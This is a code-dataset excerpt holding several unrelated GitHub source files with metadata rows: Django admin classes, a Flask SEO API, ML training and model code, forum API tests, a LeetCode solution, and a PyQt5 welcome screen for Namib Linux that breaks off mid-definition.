class AutodeskExtractorRuleAdmin(admin.ModelAdmin):
    """Admin columns for AutodeskExtractorRule, prefixed with its owning project/group."""
    list_display = (
        "project",
        "model_group",
        "name",
        "description",
        "created_at",
        "updated_at",
        "created_by",
        "updated_by",
        "deleted_at",
        "deleted_by",
    )
class BimModelAdmin(admin.ModelAdmin):
    """Admin columns for BimModel; same layout as AutodeskExtractorRuleAdmin."""
    list_display = (
        "project",
        "model_group",
        "name",
        "description",
        "created_at",
        "updated_at",
        "created_by",
        "updated_by",
        "deleted_at",
        "deleted_by",
    )
class JobAdmin(admin.ModelAdmin):
    """Admin columns for Job: owning project, task type/id, and creation time."""
    list_display = (
        "project",
        "task_type",
        "created_at",
        "task_id",
    )
# Register each model with its customized ModelAdmin.
# NOTE(review): `admin` and `dj_admin` are the same module, so all of these
# go to the same admin site; WorkAdmin is defined above but never
# registered — confirm whether a model should use it.
admin.site.register(Project, ProjectAdmin)
admin.site.register(ModelGroup, ModelGroupAdmin)
admin.site.register(AutodeskExtractorRule, AutodeskExtractorRuleAdmin)
admin.site.register(BimModel, BimModelAdmin)
admin.site.register(Job, JobAdmin)
# ActiveLink and URN use the default ModelAdmin.
dj_admin.site.register(ActiveLink)
dj_admin.site.register(URN)
| kishik/ADCM-Scheduler | myapp/admin.py | admin.py | py | 1,783 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 11,
"usage_type": "attribute"
... |
32068966886 | from flask import Flask, request, jsonify
from tf_idf import get_text, scrape_google, tf_idf_analysis
app = Flask(__name__)
@app.route('/get_text')
def get_text_endpoint():
    """Return the extracted text of the page at ?url=... as JSON."""
    target_url = request.args.get('url')
    page_text = get_text(target_url)
    return jsonify(text=page_text)
@app.route('/scrape_google')
def scrape_google_endpoint():
    """Return Google result links for ?query=... as JSON."""
    search_query = request.args.get('query')
    result_links = scrape_google(search_query)
    return jsonify(links=result_links)
@app.route('/tf_idf_analysis')
def tf_idf_analysis_endpoint():
    """Return the TF-IDF analysis for ?keyword=... as JSON."""
    keyword = request.args.get('keyword')
    analysis = tf_idf_analysis(keyword)
    return jsonify(result=analysis)
if __name__ == '__main__':
    # Development entry point.  NOTE(review): debug=True enables the
    # interactive Werkzeug debugger — confirm it is disabled in production.
    app.run(debug=True)
| farahramzy/seopro | python/app.py | app.py | py | 657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
16158666088 | import json
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
import joblib
import sys
def train_model():
    """Train one linear-regression model per variable from JSON in argv[1].

    Expects sys.argv[1] to be a JSON list of objects with keys 'dataName'
    and 'dataSource' (rows containing 'timeStamp' and 'dataValue').
    Each fitted model is persisted as trained_model_<name>.joblib and a
    JSON status summary is printed to stdout for the calling process.
    """
    jsondata = json.loads(sys.argv[1])
    # Names of the variables whose models were trained and saved.
    trained_names = []
    for variable_data in jsondata:
        variable_name = variable_data['dataName']
        df = pd.DataFrame(variable_data['dataSource'])
        # Derive time-of-day features from the timestamp column.
        df['timeStamp'] = pd.to_datetime(df['timeStamp'])
        df['hour'] = df['timeStamp'].dt.hour
        df['minute'] = df['timeStamp'].dt.minute
        df['second'] = df['timeStamp'].dt.second
        target = 'dataValue'
        X = df[['hour', 'minute', 'second']]
        y = df[target]
        model = LinearRegression()
        model.fit(X, y)
        joblib.dump(model, f'trained_model_{variable_name}.joblib')
        trained_names.append(variable_name)
    # Bug fix: the previous version placed the fitted LinearRegression
    # objects themselves in the response, which json.dumps cannot
    # serialize, so the script always printed "An error occurred: ..."
    # instead of JSON.  Report the trained variable names (each model's
    # joblib filename is derived from its name) so stdout is valid JSON.
    response_data = {"models": trained_names, "status": "trained"}
    try:
        print(json.dumps(response_data))
    except Exception as e:
        print(f"An error occurred: {e}")


train_model()
| MadakariNayakaHM/FinalYearProject | pythonScripts/new2.py | new2.py | py | 1,106 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "json.loads",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pandas.to_datetime",
"lin... |
9356643217 | import random
import tensorflow as tf
from AI.agent import Agent
from AI.ROSEnvironment import ArmControlPlateform
from config import get_config
# Command-line flag definitions (TF1-style tf.app.flags).
flags = tf.app.flags
# Model
flags.DEFINE_string('model', 'DQN', 'Type of model')
# Environment
#flags.DEFINE_string('env_name', 'Acrobot-v1', 'The name of gym environment to use')
# Etc
#flags.DEFINE_boolean('display', True, 'Whether to do display the game screen or not')
flags.DEFINE_integer('random_seed', 123, 'Value of random seed')
FLAGS = flags.FLAGS
# Set random seed for both TensorFlow and Python's RNG so runs are reproducible.
tf.set_random_seed(FLAGS.random_seed)
random.seed(FLAGS.random_seed)
def main(_):
    """Entry point for tf.app.run: build the environment and run one
    learning session of the agent.

    The unused parameter receives argv from tf.app.run.
    """
    config = get_config(FLAGS) or FLAGS
    env = ArmControlPlateform(config)
    # Single training episode loop (range(1) keeps the structure for more runs).
    for _ in range(1):
        env.reset()
        agent = Agent(config, env)
        agent.activate(learn=True)
def test():
    """Smoke-test the environment by stepping 30 random actions."""
    from time import sleep  # bug fix: `sleep` was used without being imported

    config = get_config(FLAGS) or FLAGS
    env = ArmControlPlateform(config)
    env.reset()
    for i in range(30):
        # Brief pause between steps so the ROS platform can keep up.
        sleep(0.1)
        action = env.action_space.sample()
        ob, re, ter = env.step(action)
        print(ob, re, ter)
if __name__ == '__main__':
    # Parse flags and dispatch to main() via the TF1 app runner.
    tf.app.run()
#test() | wlwlw/VisualArm | ArmRLAIController.py | ArmRLAIController.py | py | 1,111 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "tensorflow.app",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.set_random_seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "random.seed",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "config.get_... |
40402312512 | from tests.baseTest import *
from lib.random_generator import RandomGenerator
from lib.api_requests import RequestManager
from grappa import should
from api_endpoints.signup_endpoint import SignupMethods
from api_endpoints.threads_endpoint import ThreadsMethods
from lib.data_encoder import Encoder
class ViewThreadsTest(BaseTest):
    """API tests for listing forum threads (GET /threads)."""

    # Shared helpers for random data, HTTP calls, and credential encoding.
    rand = RandomGenerator()
    rm = RequestManager()
    encoder = Encoder()
    @classmethod
    def setUpClass(cls):
        """Create a test account, build its Basic-auth header, and seed one thread."""
        BaseTest.setUpClass()
        account_data = SignupMethods().create_test_account(generate_fields=True)[0]
        # Basic auth payload is "username:password", base64-encoded.
        data_to_encode = account_data['username'] + ':' + account_data['password']
        encoded_credentials = cls.encoder.encode_data(data_to_encode)
        cls.thread_auth_headers = {'Authorization': 'Basic ' + encoded_credentials}
        # Ensure at least one public thread exists before the tests run.
        sample_thread = cls.rand.generate_random_string(10)
        ThreadsMethods().create_sample_thread(authorization=cls.thread_auth_headers, thread_name=sample_thread,
                                              private=False)
    def setUp(self):
        BaseTest.setUp(self)
        self.threads_url = self.CONFIG['API_ADDRESS'] + '/threads'
    def test_01_get_last_threads(self):
        """Listing threads returns a well-formed page of ThreadModel items."""
        logging.info('Trying to get last threads')
        result = ThreadsMethods().get_threads(authorization=self.thread_auth_headers)
        logging.info('Server responded with %s' % result)
        result['code'] | should.be.equal.to(200)
        result['response']['itemsFound'] | should.be.a(int)
        result['response']['limit'] | should.be.a(int)
        result['response']['limit'] | should.be.equal.to(100)
        # At least the seeded thread, never more than the page limit.
        len(result['response']['items']) | should.be.higher.than(0)
        len(result['response']['items']) | should.be.lower.than(101)
        result['response']['items'][0]['createdAt'] | should.be.a(int)
        result['response']['items'][0]['updatedAt'] | should.be.a(int)
        result['response']['items'][0]['id'] | should.be.a(str)
        result['response']['items'][0]['id'] | should.not_be.none
        result['response']['items'][0]['modelType'] | should.be.equal.to('ThreadModel')
        result['response']['items'][0]['name'] | should.be.a(str)
        result['response']['items'][0]['owner'] | should.be.a(str)
        result['response']['items'][0]['users'] | should.be.a(list)
        result['response']['items'][0]['private'] | should.be.a(bool)
        result['response']['items'][0]['deleted'] | should.be.a(bool)
    def test_02_get_last_threads(self):
        """With more threads than the page limit, the listing caps at 100 items."""
        # Create 102 threads so more than one full page (limit 100) exists.
        logging.info('Generating 100 threads')
        for i in range(0, 102):
            sample_thread = self.rand.generate_random_string(10)
            ThreadsMethods().create_sample_thread(authorization=self.thread_auth_headers, thread_name=sample_thread,
                                                  private=False)
        logging.info('Trying to get last 100 threads')
        result = ThreadsMethods().get_threads(authorization=self.thread_auth_headers)
        logging.info('Server responded with %s' % result)
        result['code'] | should.be.equal.to(200)
        len(result['response']['items']) | should.be.equal.to(100)
| mdomosla/zadanie2-testy-forum | tests/threads/viewThreads_test.py | viewThreads_test.py | py | 3,144 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "lib.random_generator.RandomGenerator",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "lib.api_requests.RequestManager",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lib.data_encoder.Encoder",
"line_number": 13,
"usage_type": "call"
... |
24639708926 | from typing import List, Tuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import Tensor, nn
def get_cnn_output_dim(
    input_size: int, conv_kernel_size: int, padding_size: int, conv_stride_size: int
) -> int:
    """Size of one spatial dimension after a convolution layer.

    Standard conv arithmetic: (in + 2*pad - kernel) / stride + 1.  True
    division is used, so the result is a float when the sizes do not divide
    evenly; callers floor it via the pooling formula.
    """
    effective = input_size + 2 * padding_size - conv_kernel_size
    return effective / conv_stride_size + 1
def get_pool_output_dim(
    input_size, pool_kernel_size: int, pool_stride_size: int
) -> int:
    """Size of one spatial dimension after a pooling layer (floored)."""
    stepped = (input_size - pool_kernel_size) / pool_stride_size
    return np.floor(stepped + 1)
def get_cnn_layer_output_dim(
    n_layers: int,
    input_size: int,
    conv_kernel_size: int,
    padding_size: int = 0,
    conv_stride_size: int = 1,
    pool_kernel_size: int = 2,
    pool_stride_size: int = 2,
) -> int:
    """Spatial size of one dimension after `n_layers` conv+pool stages.

    Each stage applies the convolution output formula followed by the
    floored pooling formula; the final result is truncated to int, exactly
    as the original recursive version did.

    Refactor: the original duplicated the conv/pool computation in both
    branches of its recursion; a simple loop removes the copy-paste and
    any recursion-depth concern.
    """
    size = input_size
    for _ in range(n_layers):
        conv_out = get_cnn_output_dim(
            size, conv_kernel_size, padding_size, conv_stride_size
        )
        size = get_pool_output_dim(conv_out, pool_kernel_size, pool_stride_size)
    return int(size)
class MultivariateMLP(nn.Module):
    """MLP with a shared encoder and one softmax classification head per
    input channel.

    forward() returns a list of per-channel probability tensors.
    """

    def __init__(
        self,
        input_dimension: Tuple,
        in_channels: int,
        n_outputs: int,
    ):
        super().__init__()
        self.in_channels = in_channels
        # Shared encoder: flatten the whole input, then one hidden layer.
        self.encoder = nn.Sequential(
            FlattenMLP(),
            nn.Linear(input_dimension[0] * input_dimension[1] * 1 * in_channels, 564),
            nn.ReLU(),
            nn.Dropout(0.5),
        )
        # Bug fix: a plain Python list hides these layers from PyTorch, so
        # their parameters were not registered (absent from .parameters(),
        # .to(device) and state_dict).  nn.ModuleList registers them while
        # staying index/iteration-compatible with the old list.
        self.linear_classifiers = nn.ModuleList(
            [nn.Linear(564, n_outputs) for _ in range(in_channels)]
        )

    def forward(self, x):
        out = self.encoder(x)
        # One softmax distribution per channel head.
        outputs = [
            F.softmax(classifier(out), dim=-1) for classifier in self.linear_classifiers
        ]
        return outputs
class Flatten(nn.Module):
    """A custom layer that views an input as (batch, -1), i.e. flattens
    everything except the batch dimension."""

    def forward(self, input):
        batch_size = input.size(0)
        return input.view(batch_size, -1)
class FlattenMLP(nn.Module):
    """A custom layer that collapses its entire input into a single 1D
    vector (batch dimension included)."""

    def forward(self, input):
        return torch.flatten(input)
class MultivariateCNN(nn.Module):
    """Two-conv-stage CNN with a shared encoder and one softmax head per
    input channel.

    Adapted from https://github.com/ArminBaz/UTK-Face/blob/master/src/MultNN.py
    forward() returns a list of per-channel probability tensors.
    """

    def __init__(
        self,
        input_dimension: Tuple,
        in_channels: int,
        n_outputs: int,
        n_cnn_layers: int = 2,
        conv_kernel_size: int = 2,
        pool_kernel_size: int = 2,
        conv_channels_1: int = 256,
        conv_channels_2: int = 512,
        linear_hidden_cells: int = 256,
        linear_dropout: float = 0.5,
    ):
        super(MultivariateCNN, self).__init__()
        self.in_channels = in_channels
        # Spatial extent of the feature map after the conv/pool stack,
        # needed to size the first fully-connected layer.
        linear_dim1 = get_cnn_layer_output_dim(
            n_layers=n_cnn_layers,
            input_size=input_dimension[0],
            conv_kernel_size=conv_kernel_size,
            pool_kernel_size=pool_kernel_size,
        )
        linear_dim2 = get_cnn_layer_output_dim(
            n_layers=n_cnn_layers,
            input_size=input_dimension[1],
            conv_kernel_size=conv_kernel_size,
            pool_kernel_size=pool_kernel_size,
        )
        self.encoder = nn.Sequential(
            nn.Conv2d(
                in_channels=in_channels,
                out_channels=conv_channels_1,
                kernel_size=conv_kernel_size,
            ),
            nn.ReLU(),
            nn.MaxPool2d(kernel_size=pool_kernel_size),
            nn.Conv2d(
                in_channels=conv_channels_1,
                out_channels=conv_channels_2,
                kernel_size=conv_kernel_size,
            ),
            nn.ReLU(),
            nn.MaxPool2d(kernel_size=pool_kernel_size),
            Flatten(),
            nn.Linear(linear_dim1 * linear_dim2 * conv_channels_2, linear_hidden_cells),
            nn.ReLU(),
            nn.Dropout(linear_dropout),
        )
        # Bug fix: a plain Python list hides these layers from PyTorch, so
        # their parameters were not registered (absent from .parameters(),
        # .to(device) and state_dict).  nn.ModuleList registers them while
        # staying index/iteration-compatible with the old list.
        self.linear_classifiers = nn.ModuleList(
            [nn.Linear(linear_hidden_cells, n_outputs) for _ in range(in_channels)]
        )

    def forward(self, x):
        out = self.encoder(x)
        # One softmax distribution per channel head.
        outputs = [
            F.softmax(classifier(out), dim=-1) for classifier in self.linear_classifiers
        ]
        return outputs
| aleksei-mashlakov/m6_competition | src/mv_cnn_model.py | mv_cnn_model.py | py | 5,039 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "numpy.floor",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_nu... |
8138880318 | from collections import Counter
class Solution:
def longestPalindrome(self, s: str) -> int:
counter = Counter(s)
ans = 0
odd = False
for k,v in counter.items():
ans += v // 2 * 2
if v % 2:
odd = True
if odd: ans += 1
return ans | MinecraftDawn/LeetCode | Easy/409. Longest Palindrome.py | 409. Longest Palindrome.py | py | 321 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "collections.Counter",
"line_number": 4,
"usage_type": "call"
}
] |
6583723969 | #!/usr/bin/python3
from PyQt5 import QtCore, QtGui, QtWidgets
import webbrowser
import os
import subprocess
class Ui_WelcomeScreen(object):
    ######################### CUSTOM ACTIONS ##########################
    # Each *ButtonAction slot opens the matching community page in the
    # user's default web browser.
    def forumButtonAction(self):
        webbrowser.open("https://forum.namiblinux.org/categories")
    def chatButtonAction(self):
        webbrowser.open("https://www.namiblinux.org/support/chat/")
    def donateButtonAction(self):
        webbrowser.open("https://www.namiblinux.org/donate/")
    def wikiButtonAction(self):
        webbrowser.open("https://wiki.namiblinux.org/")
    def newsButtonAction(self):
        webbrowser.open("https://forum.namiblinux.org/c/announcements")
    def helpButtonAction(self):
        webbrowser.open("https://github.com/namiblinux")
    def installButtonAction(self):
        # Launch the Calamares system installer with polkit elevation.
        subprocess.Popen(["calamares_polkit"])
def startCheckAction(self):
if self.launchAtStartCheck.isChecked():
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
subprocess.Popen(["cp", "/usr/share/applications/namib-welcome.desktop", autostartfile])
else:
homedir = os.path.expanduser('~')
autostartfile = os.path.join(homedir, ".config/autostart/namib-welcome.desktop")
subprocess.Popen(["rm", autostartfile])
#####################################################################
def setupUi(self, WelcomeScreen):
WelcomeScreen.setObjectName("WelcomeScreen")
WelcomeScreen.resize(640, 480)
WelcomeScreen.setMinimumSize(640, 480)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/namib-welcome.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
WelcomeScreen.setWindowIcon(icon)
self.MainWidget = QtWidgets.QWidget(WelcomeScreen)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.MainWidget.sizePolicy().hasHeightForWidth())
self.MainWidget.setSizePolicy(sizePolicy)
self.MainWidget.setAutoFillBackground(False)
self.MainWidget.setObjectName("MainWidget")
self.gridLayout = QtWidgets.QGridLayout(self.MainWidget)
self.gridLayout.setObjectName("gridLayout")
self.mainGrid = QtWidgets.QGridLayout()
self.mainGrid.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.mainGrid.setObjectName("mainGrid")
self.wikiButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wikiButton.sizePolicy().hasHeightForWidth())
self.wikiButton.setSizePolicy(sizePolicy)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/wiki.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.wikiButton.setIcon(icon1)
self.wikiButton.setObjectName("wikiButton")
######################### WIKI BUTTON ##########################
self.wikiButton.clicked.connect(self.wikiButtonAction)
################################################################
self.mainGrid.addWidget(self.wikiButton, 7, 0, 1, 1)
self.lineTop = QtWidgets.QFrame(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineTop.sizePolicy().hasHeightForWidth())
self.lineTop.setSizePolicy(sizePolicy)
self.lineTop.setFrameShape(QtWidgets.QFrame.HLine)
self.lineTop.setFrameShadow(QtWidgets.QFrame.Sunken)
self.lineTop.setObjectName("lineTop")
self.mainGrid.addWidget(self.lineTop, 4, 0, 1, 3)
self.logoLayout = QtWidgets.QHBoxLayout()
self.logoLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.logoLayout.setObjectName("logoLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.logoLayout.addItem(spacerItem)
self.Logo = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Logo.sizePolicy().hasHeightForWidth())
self.Logo.setSizePolicy(sizePolicy)
self.Logo.setMaximumSize(QtCore.QSize(64, 64))
self.Logo.setText("")
self.Logo.setPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/logo.png"))
self.Logo.setScaledContents(True)
self.Logo.setWordWrap(False)
self.Logo.setObjectName("Logo")
self.logoLayout.addWidget(self.Logo)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.logoLayout.addItem(spacerItem1)
self.mainGrid.addLayout(self.logoLayout, 0, 0, 1, 3)
self.linksLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.linksLabel.sizePolicy().hasHeightForWidth())
self.linksLabel.setSizePolicy(sizePolicy)
self.linksLabel.setScaledContents(True)
self.linksLabel.setWordWrap(True)
self.linksLabel.setObjectName("linksLabel")
self.mainGrid.addWidget(self.linksLabel, 5, 0, 1, 3)
self.donateButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.donateButton.sizePolicy().hasHeightForWidth())
self.donateButton.setSizePolicy(sizePolicy)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/donate.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.donateButton.setIcon(icon2)
self.donateButton.setObjectName("donateButton")
######################### DONATE BUTTON ########################
self.donateButton.clicked.connect(self.donateButtonAction)
################################################################
self.mainGrid.addWidget(self.donateButton, 7, 2, 1, 1)
self.chatButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.chatButton.sizePolicy().hasHeightForWidth())
self.chatButton.setSizePolicy(sizePolicy)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/chat.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.chatButton.setIcon(icon3)
self.chatButton.setObjectName("chatButton")
######################### CHAT BUTTON ##########################
self.chatButton.clicked.connect(self.chatButtonAction)
###############################################################
self.mainGrid.addWidget(self.chatButton, 7, 1, 1, 1)
self.installationLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.installationLabel.sizePolicy().hasHeightForWidth())
self.installationLabel.setSizePolicy(sizePolicy)
self.installationLabel.setObjectName("installationLabel")
######################### INSTALL LABEL ##########################
self.installationLabel.setVisible(False)
##################################################################
self.mainGrid.addWidget(self.installationLabel, 8, 1, 1, 1)
self.installButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.installButton.sizePolicy().hasHeightForWidth())
self.installButton.setSizePolicy(sizePolicy)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/install.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.installButton.setIcon(icon4)
self.installButton.setObjectName("installButton")
######################### INSTALL BUTTON ##########################
self.installButton.clicked.connect(self.installButtonAction)
self.installButton.setVisible(False)
###################################################################
self.mainGrid.addWidget(self.installButton, 9, 1, 1, 1)
self.welcomeLabel = QtWidgets.QLabel(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.welcomeLabel.sizePolicy().hasHeightForWidth())
self.welcomeLabel.setSizePolicy(sizePolicy)
self.welcomeLabel.setObjectName("welcomeLabel")
self.mainGrid.addWidget(self.welcomeLabel, 1, 0, 1, 3)
self.lineBottom = QtWidgets.QFrame(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineBottom.sizePolicy().hasHeightForWidth())
self.lineBottom.setSizePolicy(sizePolicy)
self.lineBottom.setFrameShape(QtWidgets.QFrame.HLine)
self.lineBottom.setFrameShadow(QtWidgets.QFrame.Sunken)
self.lineBottom.setObjectName("lineBottom")
self.mainGrid.addWidget(self.lineBottom, 10, 0, 1, 3)
self.forumsButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.forumsButton.sizePolicy().hasHeightForWidth())
self.forumsButton.setSizePolicy(sizePolicy)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/forums.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.forumsButton.setIcon(icon5)
self.forumsButton.setObjectName("forumsButton")
######################### FORUM BUTTON #########################
self.forumsButton.clicked.connect(self.forumButtonAction)
################################################################
self.mainGrid.addWidget(self.forumsButton, 6, 1, 1, 1)
self.settingsLayout = QtWidgets.QHBoxLayout()
self.settingsLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)
self.settingsLayout.setObjectName("settingsLayout")
self.languageSelector = QtWidgets.QComboBox(self.MainWidget)
self.languageSelector.setObjectName("languageSelector")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.languageSelector.addItem("")
self.settingsLayout.addWidget(self.languageSelector)
self.languageSelector.hide()
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.settingsLayout.addItem(spacerItem2)
self.launchAtStartCheck = QtWidgets.QCheckBox(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.launchAtStartCheck.sizePolicy().hasHeightForWidth())
self.launchAtStartCheck.setSizePolicy(sizePolicy)
self.launchAtStartCheck.setLayoutDirection(QtCore.Qt.LeftToRight)
self.launchAtStartCheck.setObjectName("launchAtStartCheck")
######################### LAUNCH AT START BUTTON #########################
self.launchAtStartCheck.clicked.connect(self.startCheckAction)
##########################################################################
self.settingsLayout.addWidget(self.launchAtStartCheck)
self.mainGrid.addLayout(self.settingsLayout, 11, 0, 1, 3)
self.helpButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.helpButton.sizePolicy().hasHeightForWidth())
self.helpButton.setSizePolicy(sizePolicy)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("/usr/share/namib-welcome/img/helpus.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.helpButton.setIcon(icon6)
self.helpButton.setObjectName("helpButton")
######################### HELP BUTTON #########################
self.helpButton.clicked.connect(self.helpButtonAction)
###############################################################
self.mainGrid.addWidget(self.helpButton, 6, 2, 1, 1)
self.newsButton = QtWidgets.QPushButton(self.MainWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newsButton.sizePolicy().hasHeightForWidth())
self.newsButton.setSizePolicy(sizePolicy)
icon7 = QtGui.QIcon()
